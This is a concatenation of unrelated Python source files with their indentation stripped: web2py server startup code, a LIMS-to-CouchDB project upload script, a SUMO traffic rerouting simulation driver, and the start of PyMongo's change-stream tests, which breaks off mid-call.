from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print 'starting single-scheduler for "%s"...' % app_
run(app_, True, True, None, False, code)
return
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print 'starting scheduler for "%s"...' % app_
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print "Currently running %s scheduler processes" % (len(processes))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print "Processes started"
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print "Processes stopped"
except:
p.terminate()
p.join()
def start(cron=True):
""" Starts server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal.adapters.base import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
logfile0 = os.path.join('extras','examples','logging.example.conf')
if not os.path.exists('logging.conf') and os.path.exists(logfile0):
import shutil
sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
shutil.copyfile(logfile0, 'logging.conf')
sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if options.folder:
os.chdir(options.folder)
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui and options.password=='<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
# ##-X (if no tk, the widget takes care of it itself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
message = '\nplease visit:\n\t%s\n' % url
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
print message
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
project_summary_upload_LIMS.py
|
#!/usr/bin/env python
"""Script to load project info from Lims into the project database in statusdb.
Maya Brandi, Science for Life Laboratory, Stockholm, Sweden.
"""
from __future__ import print_function
from genologics.config import BASEURI, USERNAME, PASSWORD
from genologics.lims import *
from LIMS2DB.objectsDB.functions import *
from optparse import OptionParser
from LIMS2DB.utils import formatStack
from statusdb.db.utils import *
from genologics_sql.queries import get_last_modified_projectids
from genologics_sql.utils import *
from genologics_sql.tables import Project as DBProject
from LIMS2DB.classes import ProjectSQL
from pprint import pprint
import codecs
import datetime
import LIMS2DB.objectsDB.objectsDB as DB
import logging
import logging.handlers
import multiprocessing as mp
import os
import Queue
import sys
import time
import traceback
import yaml  # needed by main() to load the orderportal config
class PSUL():
def __init__(self, proj, samp_db, proj_db, upload_data, man_name, output_f, log):
self.proj = proj
self.id = proj.id
self.udfs = proj.udf
self.name = proj.name
self.open_date = proj.open_date
self.close_date = proj.close_date
self.samp_db = samp_db
self.proj_db = proj_db
self.upload_data = upload_data
self.man_name = man_name
self.output_f = output_f
self.ordered_opened = self.get_ordered_opened()
self.lims = Lims(BASEURI, USERNAME, PASSWORD)
self.log=log
def print_couchdb_obj_to_file(self, obj):
if self.output_f is not None:
with open(self.output_f, 'w') as f:
print(obj, file = f)
else:
print(obj, file = sys.stdout)
def get_ordered_opened(self):
"""Is project registered as opened or ordered?"""
if self.open_date:
return self.open_date
elif 'Order received' in self.proj.udf:
return self.proj.udf['Order received'].isoformat()
else:
return datetime.date.today().strftime("%Y-%m-%d")
def determine_update(self):
"""Determine wether to and how to update project"""
opened_after_130630 = comp_dates('2013-06-30', self.ordered_opened)
log_info = ''
if not opened_after_130630 :
start_update = False
self.log.info('Project is not updated because: '
'It was opened or ordered before 2013-06-30 : '
'({ord_op})'.format(ord_op = self.ordered_opened))
else:
start_update = True
return start_update
def update_project(self):
"""Fetch project info and update project in the database."""
self.log.info('Handling {proj}'.format(proj = self.name))
project = DB.ProjectDB(self.lims, self.id, self.samp_db, self.log)
key = find_proj_from_view(self.proj_db, self.name)
project.obj['_id'] = find_or_make_key(key)
if self.upload_data:
info = save_couchdb_obj(self.proj_db, project.obj)
else:
info = self.print_couchdb_obj_to_file(project.obj)
self.log.info("project {name} is handled and {info}: _id = {id}".format(
name=self.name, info=info, id=project.obj['_id']))
def handle_project(self):
if self.determine_update():
self.update_project()
def main(options):
conf = options.conf
upload_data = options.upload
output_f = options.output_f
couch = load_couch_server(conf)
proj_db = couch['projects']
samp_db = couch['samples']
mainlims = Lims(BASEURI, USERNAME, PASSWORD)
lims_db = get_session()
mainlog = logging.getLogger('psullogger')
mainlog.setLevel(level=logging.INFO)
mfh = logging.handlers.RotatingFileHandler(options.logfile, maxBytes=209715200, backupCount=5)
mft = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mfh.setFormatter(mft)
mainlog.addHandler(mfh)
# try getting orderportal config
oconf = None
if not options.old:
try:
with open(options.oconf, 'r') as ocf:
oconf = yaml.load(ocf)['order_portal']
except Exception as e:
mainlog.warn("Loading orderportal config {} failed due to {}, so order information "\
"for project will not be updated".format(options.oconf, e))
if options.project_name:
if options.old:
proj = mainlims.get_projects(name = options.project_name)
if not proj:
mainlog.warn('No project named {man_name} in Lims'.format(
man_name = options.project_name))
return
P = PSUL(proj[0], samp_db, proj_db, options.upload, options.project_name, output_f, mainlog)
P.handle_project()
else:
host=get_configuration()['url']
pj_id=lims_db.query(DBProject.luid).filter(DBProject.name == options.project_name).scalar()
if not pj_id:
pj_id=options.project_name
P = ProjectSQL(lims_db, mainlog, pj_id, host, couch, oconf)
if options.upload:
P.save(update_modification_time=not options.no_new_modification_time)
else:
if output_f is not None:
with open(output_f, 'w') as f:
pprint(P.obj, stream=f)
else:
pprint(P.obj)
else :
projects=create_projects_list(options, lims_db, mainlims, mainlog)
masterProcess(options,projects, mainlims, mainlog, oconf)
lims_db.commit()
lims_db.close()
def create_projects_list(options, db_session,lims, log):
projects=[]
if options.all_projects:
if options.hours:
postgres_string="{} hours".format(options.hours)
project_ids=get_last_modified_projectids(db_session, postgres_string)
if options.old:
projects=lims.get_projects()
valid_projects=[Project(lims, id=x) for x in project_ids]
log.info("project list : {0}".format(" ".join([p.id for p in valid_projects])))
else:
valid_projects=db_session.query(DBProject).filter(DBProject.luid.in_(project_ids)).all()
log.info("project list : {0}".format(" ".join([p.luid for p in valid_projects])))
return valid_projects
else:
if options.old:
projects=lims.get_projects()
log.info("project list : {0}".format(" ".join([p.id for p in projects])))
else:
projects = db_session.query(DBProject).all()
log.info("project list : {0}".format(" ".join([p.luid for p in projects])))
return projects
elif options.input:
with open(options.input, "r") as input_file:
for pname in input_file:
try:
projects.append(lims.get_projects(name=pname.rstrip())[0] )
except IndexError:
pass
return projects
def processPSUL(options, queue, logqueue, oconf=None):
couch = load_couch_server(options.conf)
proj_db = couch['projects']
samp_db = couch['samples']
mylims = Lims(BASEURI, USERNAME, PASSWORD)
db_session=get_session()
work=True
procName=mp.current_process().name
proclog=logging.getLogger(procName)
proclog.setLevel(level=logging.INFO)
mfh = QueueHandler(logqueue)
mft = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mfh.setFormatter(mft)
proclog.addHandler(mfh)
try:
time.sleep(int(procName[8:]))
except:
time.sleep(1)
while work:
#grabs project from queue
try:
projname = queue.get(block=True, timeout=3)
proclog.info("Starting work on {} ".format(projname))
proclog.info("Approximately {} projects left in queue".format(queue.qsize()))
except Queue.Empty:
work=False
proclog.info("exiting gracefully")
break
except NotImplementedError:
#qsize failed, no big deal
pass
else:
#locks the project : cannot be updated more than once.
lockfile=os.path.join(options.lockdir, projname)
if not os.path.exists(lockfile):
try:
open(lockfile,'w').close()
except:
proclog.error("cannot create lockfile {}".format(lockfile))
if options.old:
try:
proj=mylims.get_projects(name=projname)[0]
P = PSUL(proj, samp_db, proj_db, options.upload, options.project_name, options.output_f, proclog)
P.handle_project()
except :
error=sys.exc_info()
stack=traceback.extract_tb(error[2])
proclog.error("{0}:{1}\n{2}".format(error[0], error[1], formatStack(stack)))
else:
try:
pj_id=db_session.query(DBProject.luid).filter(DBProject.name == projname).scalar()
host=get_configuration()['url']
P = ProjectSQL(db_session, proclog, pj_id, host, couch, oconf)
P.save()
except :
error=sys.exc_info()
stack=traceback.extract_tb(error[2])
proclog.error("{0}:{1}\n{2}".format(error[0], error[1], formatStack(stack)))
try:
os.remove(lockfile)
except:
proclog.error("cannot remove lockfile {}".format(lockfile))
else:
proclog.info("project {} is locked, skipping.".format(projname))
#signals to queue job is done
queue.task_done()
db_session.commit()
db_session.close()
def masterProcess(options,projectList, mainlims, logger, oconf=None):
projectsQueue=mp.JoinableQueue()
logQueue=mp.Queue()
childs=[]
#Initial step : order projects by sample number:
logger.info("ordering the project list")
orderedprojectlist=sorted(projectList, key=lambda x: (mainlims.get_sample_number(projectname=x.name)), reverse=True)
logger.info("done ordering the project list")
#spawn a pool of processes, and pass them queue instance
for i in range(options.processes):
p = mp.Process(target=processPSUL, args=(options,projectsQueue, logQueue, oconf))
p.start()
childs.append(p)
#populate queue with data
for proj in orderedprojectlist:
projectsQueue.put(proj.name)
#wait on the queue until everything has been processed
notDone=True
while notDone:
try:
log=logQueue.get(False)
logger.handle(log)
except Queue.Empty:
if not stillRunning(childs):
notDone=False
break
def stillRunning(processList):
ret=False
for p in processList:
if p.is_alive():
ret=True
return ret
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
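# Hedged usage sketch (added; not part of the original script): each worker process
# attaches a QueueHandler to its own logger,
#     proclog = logging.getLogger(mp.current_process().name)
#     proclog.addHandler(QueueHandler(logqueue))
# and the parent drains the shared queue and re-dispatches the records through its
# configured handlers, as masterProcess() does with logger.handle(logQueue.get(False)).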
if __name__ == '__main__':
usage = "Usage: python project_summary_upload_LIMS.py [options]"
parser = OptionParser(usage=usage)
parser.add_option("-p", "--project", dest = "project_name", default = None,
help = "eg: M.Uhlen_13_01. Dont use with -a flagg.")
parser.add_option("-a", "--all_projects", dest = "all_projects", action =
"store_true", default = False, help = ("Upload all Lims ",
"projects into couchDB. Don't use with -f flagg."))
parser.add_option("-c", "--conf", dest = "conf", default = os.path.join(
os.environ['HOME'],'opt/config/post_process.yaml'), help =
"Config file. Default: ~/opt/config/post_process.yaml")
parser.add_option("--oconf", dest = "oconf", default = os.path.join(
os.environ['HOME'],'.ngi_config/orderportal_cred.yaml'),
help = "Orderportal config file. Default: ~/.ngi_config/orderportal_cred.yaml")
parser.add_option("--no_upload", dest = "upload", default = True, action =
"store_false", help = ("Use this tag if project objects ",
"should not be uploaded, but printed to output_f, or to ",
"stdout"))
parser.add_option("--output_f", dest = "output_f", help = ("Output file",
" that will be used only if --no_upload tag is used"), default=None)
parser.add_option("-m", "--multiprocs", type='int', dest = "processes", default = 4,
help = "How many processes will be spawned. Will only work with -a")
parser.add_option("-l", "--logfile", dest = "logfile", help = ("log file",
" that will be used. default is $HOME/lims2db_projects.log "), default=os.path.expanduser("~/lims2db_projects.log"))
parser.add_option("--lockdir", dest = "lockdir", help = ("directory handling the lock files",
" to avoid multiple updating of one project. default is $HOME/psul_locks "), default=os.path.expanduser("~/psul_locks"))
parser.add_option("-j", "--hours", dest = "hours",type='int', help = ("only handle projects modified in the last X hours"), default=None)
parser.add_option("-k", "--control", dest = "control", action="store_true", help = ("only perform a dry-run"), default=False)
parser.add_option("-i", "--input", dest = "input", help = ("path to the input file containing projects to update"), default=None)
parser.add_option("--old", dest = "old", help = ("use the old version of psul, via the API"), action="store_true", default=False)
parser.add_option("--no_new_modification_time", action="store_true", help=("This updates documents without changing the modification"
" time. Slightly dangerous, but useful e.g. when all projects would be updated. Does not work together with '--old'"))
(options, args) = parser.parse_args()
main(options)
|
generic_its.py
|
#!/usr/bin/env python
from __future__ import division
import subprocess
import os
import logging
import sys
import tempfile
import math
import random
import time
import numpy as np
import json
import warnings
import multiprocessing as mp
from k_shortest_paths import k_shortest_paths
from optparse import OptionParser
import sumo_mannager
import graph_mannager
#import log_mannager
import traffic_mannager
import traci
import time
import inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
from timewindow.contextual import Contextual
def iterate_metrics(all_metrics):
traffic, crimes, crashes = [], [], []
for metrics in all_metrics:
traffic.append(metrics['traffic'])
crimes.append(metrics['crimes'])
crashes.append(metrics['crashes'])
return traffic, crimes, crashes
def create_output_file(total_count, success_count, error_count, traffic, crimes, crashes, iterate, config, city, day):
traffic_ms = (np.mean(traffic), np.std(traffic))
crimes_ms = (np.mean(crimes), np.std(crimes))
crashes_ms = (np.mean(crashes), np.std(crashes))
metrics = {}
metrics['total_count'] = total_count
metrics['success_count'] = success_count
metrics['error_count'] = error_count
metrics['out_traffic'] = traffic
metrics['out_crimes'] = crimes
metrics['out_crashes'] = crashes
metrics['traffic'] = {'mean': traffic_ms[0], 'std': traffic_ms[1]}
metrics['crimes'] = {'mean': crimes_ms[0], 'std': crimes_ms[1]}
metrics['crashes'] = {'mean': crashes_ms[0], 'std': crashes_ms[1]}
with open('../output/data/{0}/{1}/{2}/{3}_metrics.json'.format(day, city, config, iterate), "w") as write_file:
json.dump(metrics, write_file, indent=4)
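# Illustrative note (added; not in the original): each iteration writes its metrics to
# '../output/data/<day>/<city>/<config>/<iterate>_metrics.json', e.g.
# '../output/data/monday/austin/traffic/0_metrics.json', holding the raw lists plus
# mean/std summaries for traffic, crimes and crashes.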
def run(network, begin, end, interval, route_log, replication, p, iterate, indx_config, config, city, day):
logging.debug("Building road graph")
road_network_graph = graph_mannager.build_road_graph(network)
error_count, total_count = 0, 0
logging.debug("Reading contextual data")
contextual = Contextual(city=city, day=day)
logging.debug("Running simulation now")
step = 1
# The time at which the first re-routing will happen
# The time at which a cycle for collecting travel time measurements begins
travel_time_cycle_begin = interval
road_map = {}
all_metrics = []
start_time = time.time()
while step == 1 or traci.simulation.getMinExpectedNumber() > 0:
#logging.debug("Minimum expected number of vehicles: %d" % traci.simulation.getMinExpectedNumber())
traci.simulationStep()
#logging.debug("Simulation time %d" % step)
if step >= travel_time_cycle_begin and travel_time_cycle_begin <= end and step%interval == 0:
road_network_graph = traffic_mannager.update_context_on_roads(road_network_graph, contextual, step, indx_config, road_map)
logging.debug("Updating travel time on roads at simulation time %d" % step)
error_count, total_count, acumulated_context = traffic_mannager.reroute_vehicles(road_network_graph, p, error_count, total_count, indx_config, road_map)
all_metrics += acumulated_context
step += 1
traffic, crimes, crashes = iterate_metrics(all_metrics)
create_output_file(total_count, total_count - error_count, error_count, traffic, crimes, crashes, iterate, config, city, day)
final_time = time.time()
print('########### TIME: ', float(final_time - start_time))
#time.sleep(10)
logging.debug("Simulation finished")
traci.close()
sys.stdout.flush()
#time.sleep(10)
def start_simulation(sumo, scenario, network, begin, end, interval, output, summary, route_log, replication, p, iterate, indx_config, config, city, day):
logging.debug("Finding unused port")
unused_port_lock = sumo_mannager.UnusedPortLock()
unused_port_lock.__enter__()
remote_port = sumo_mannager.find_unused_port()
logging.debug("Port %d was found" % remote_port)
logging.debug("Starting SUMO as a server")
sumo = subprocess.Popen([sumo, "-W", "-c", scenario, "--tripinfo-output", output, "--device.emissions.probability", "1.0", "--summary-output", summary,"--remote-port", str(remote_port)], stdout=sys.stdout, stderr=sys.stderr)
unused_port_lock.release()
try:
traci.init(remote_port)
run(network, begin, end, interval, route_log, replication, float(p), iterate, indx_config, config, city, day)
except Exception, e:
logging.exception("Something bad happened")
finally:
logging.exception("Terminating SUMO")
sumo_mannager.terminate_sumo(sumo)
unused_port_lock.__exit__()
def parallel_main_loop(city, iterate, config, day, indx_config):
pred_list = {}
parser = OptionParser()
parser.add_option("-c", "--command", dest="command", default="sumo", help="The command used to run SUMO [default: %default]", metavar="COMMAND")
parser.add_option("-s", "--scenario", dest="scenario", default="../scenario/cfgs/{0}_{1}.sumo.cfg".format(city, iterate), help="A SUMO configuration file [default: %default]", metavar="FILE")
parser.add_option("-n", "--network", dest="network", default="../scenario/{0}.net.xml".format(city), help="A SUMO network definition file [default: %default]", metavar="FILE")
parser.add_option("-b", "--begin", dest="begin", type="int", default=1500, action="store", help="The simulation time (s) at which the re-routing begins [default: %default]", metavar="BEGIN")
parser.add_option("-e", "--end", dest="end", type="int", default=7000, action="store", help="The simulation time (s) at which the re-routing ends [default: %default]", metavar="END")
parser.add_option("-i", "--interval", dest="interval", type="int", default=250, action="store", help="The interval (s) of classification [default: %default]", metavar="INTERVAL")
parser.add_option("-o", "--output", dest="output", default="../output/data/{0}/{1}/{2}/{3}_reroute.xml".format(day, city, config, iterate), help="The XML file at which the output must be written [default: %default]", metavar="FILE")
parser.add_option("-l", "--logfile", dest="logfile", default="sumo-launchd.log", help="log messages to logfile [default: %default]", metavar="FILE")
parser.add_option("-m", "--summary", dest="summary", default="../output/data/{0}/{1}/{2}/{3}_summary.xml".format(day, city, config, iterate), help="The XML file at which the summary output must be written [default: %default]", metavar="FILE")
parser.add_option("-r", "--route-log", dest="route_log", default="../output/data/{0}/{1}/{2}/{3}_route-log.txt".format(day, city, config, iterate), help="Log of the entire route of each vehicle [default: %default]", metavar="FILE")
parser.add_option("-t", "--replication", dest="replication", default="1", help="number of replications [default: %default]", metavar="REPLICATION")
parser.add_option("-p", "--percentage", dest="percentage", default="1", help="percentage of improvement on safety [default: %default]", metavar="REPLICATION")
(options, args) = parser.parse_args()
logging.basicConfig(filename=options.logfile, level=logging.DEBUG)
logging.debug("Logging to %s" % options.logfile)
if args:
logging.warning("Superfluous command line arguments: \"%s\"" % " ".join(args))
start_simulation(options.command, options.scenario, options.network, options.begin,
options.end, options.interval, options.output, options.summary, options.route_log,
options.replication, options.percentage, iterate, indx_config, config, city, day)
#if os.path.exists('sumo-launchd.log'):
# os.remove('sumo-launchd.log')
def main():
# Option handling
for day in ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']:
for city in ['austin', 'chicago']:
if not os.path.exists('../output/data'):
os.makedirs('../output/data')
if not os.path.exists('../output/data/{0}/{1}'.format(day, city)):
os.makedirs('../output/data/{0}/{1}'.format(day, city))
for indx_config, config in enumerate(['traffic', 'crimes', 'crashes', 'same', 'mtraffic', 'mcrimes', 'mcrashes', 'maxtraffic', 'maxcrimes', 'maxcrashes', 'baseline']):
if not os.path.exists('../output/data/{0}/{1}/{2}'.format(day, city, config)):
os.makedirs('../output/data/{0}/{1}/{2}'.format(day, city, config))
processes = [mp.Process(target=parallel_main_loop, args=(city, iterate, config, day, indx_config)) for iterate in range(20)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if __name__ == "__main__":
warnings.simplefilter("ignore")
main()
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from itertools import product
sys.path[0:0] = ['']
from bson import ObjectId, SON, Timestamp, encode, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.py3compat import iteritems
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo import MongoClient
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import (
EventListener, WhiteListEventListener, rs_or_single_client, wait_until)
class TestChangeStreamBase(IntegrationTest):
def change_stream_with_client(self, client, *args, **kwargs):
"""Create a change stream using the given client and return it."""
raise NotImplementedError
def change_stream(self, *args, **kwargs):
"""Create a change stream using the default client and return it."""
return self.change_stream_with_client(self.client, *args, **kwargs)
def client_with_listener(self, *commands):
"""Return a client with a WhiteListEventListener."""
listener = WhiteListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def watched_collection(self, *args, **kwargs):
"""Return a collection that is watched by self.change_stream()."""
# Construct a unique collection for each test.
collname = '.'.join(self.id().rsplit('.', 2)[1:])
return self.db.get_collection(collname, *args, **kwargs)
def generate_invalidate_event(self, change_stream):
"""Cause a change stream invalidate event."""
raise NotImplementedError
def generate_unique_collnames(self, numcolls):
"""Generate numcolls collection names unique to a test."""
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def get_resume_token(self, invalidate=False):
"""Get a resume token to use for starting a change stream."""
# Ensure targeted collection exists before starting.
coll = self.watched_collection(write_concern=WriteConcern('majority'))
coll.insert_one({})
if invalidate:
with self.change_stream(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
if isinstance(cs._target, MongoClient):
self.skipTest(
"cluster-level change streams cannot be invalidated")
self.generate_invalidate_event(cs)
return cs.next()['_id']
else:
with self.change_stream() as cs:
coll.insert_one({'data': 1})
return cs.next()['_id']
def get_start_at_operation_time(self):
"""Get an operationTime. Advances the operation clock beyond the most
recently returned timestamp."""
optime = self.client.admin.command("ping")["operationTime"]
return Timestamp(optime.time, optime.inc + 1)
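# Illustrative note (added; not in the original test): if the ping reports
# operationTime == Timestamp(1510942983, 3), this returns Timestamp(1510942983, 4),
# one increment past the most recently observed cluster time.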
def insert_one_and_check(self, change_stream, doc):
"""Insert a document and check that it shows up in the change stream."""
raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
"""Cause a cursor not found error on the next getMore."""
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
class APITestsMixin(object):
def test_watch(self):
with self.change_stream(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertIsNone(change_stream.resume_token)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.watched_collection(
write_concern=WriteConcern("majority")).insert_one({})
_ = change_stream.next()
resume_token = change_stream.resume_token
with self.assertRaises(TypeError):
self.change_stream(pipeline={})
with self.assertRaises(TypeError):
self.change_stream(full_document={})
# No Error.
with self.change_stream(resume_after=resume_token):
pass
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next()) # No changes initially.
coll.insert_one({}) # Generate a change.
# On sharded clusters, even majority-committed changes only show
# up once an event that sorts after it shows up on the other
# shard. So, we wait on try_next to eventually return changes.
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
wait_until(lambda: stream.try_next() is not None,
